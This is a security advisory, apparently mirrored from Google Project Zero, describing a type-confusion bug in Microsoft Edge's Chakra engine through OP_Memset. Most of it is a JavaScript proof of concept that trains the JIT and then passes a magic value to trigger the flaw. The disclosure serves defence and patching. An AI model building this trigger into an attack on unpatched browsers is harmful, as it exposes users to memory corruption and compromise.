Microsoft Edge Chakra OP_Memset Type Confusion

2018-11-19T00:00:00
ID PACKETSTORM:150393
Type packetstorm
Reporter Google Security Research
Modified 2018-11-19T00:00:00

Description

                                        
                                            `Microsoft Edge: Chakra: Type confusion with OP_Memset   
  
  
  
  
Microsoft Edge: Chakra: Type confusion with OP_Memset  
  
Since the patch for CVE-2018-8372, it checks all inputs to native arrays, and if any input equals to the MissingItem value which can cause type confusion, it starts the bailout process. But it doesn't check the "value" argument to OP_Memset. This can be exploited in the same way as for <a href="/p/project-zero/issues/detail?id=1581" title="Microsoft Edge: Chakra: JIT: Magic value can cause type confusion #2" class="closed_ref" rel="nofollow"> issue 1581 </a>.  
  
PoC:  
function memset(arr, value, n) {  
for (let i = 0; i < n; i++) {  
arr[i] = value;  
}  
}  
  
function trigger(arr, buggy) {  
let tmp = [1];  
  
arr.length;  
  
let res = tmp.concat(buggy);  
arr[0] = 0x1234;  
arr[1] = 0;  
}  
  
function main() {  
let tmp = (new Array(100)).fill(1);  
for (let i = 0; i < 500; i++) {  
memset(tmp, 1, tmp.length);  
trigger(tmp, [1]);  
}  
  
setTimeout(() => {  
let buggy = [1];  
let arr = [1, 2];  
  
arr.getPrototypeOf = Object.prototype.valueOf;  
  
buggy.__proto__ = new Proxy({}, arr);  
  
memset(buggy, -524286, 1);  
trigger(arr, buggy);  
  
alert(arr);  
}, 100);  
}  
  
main();  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available (whichever is earlier), the bug  
report will become visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`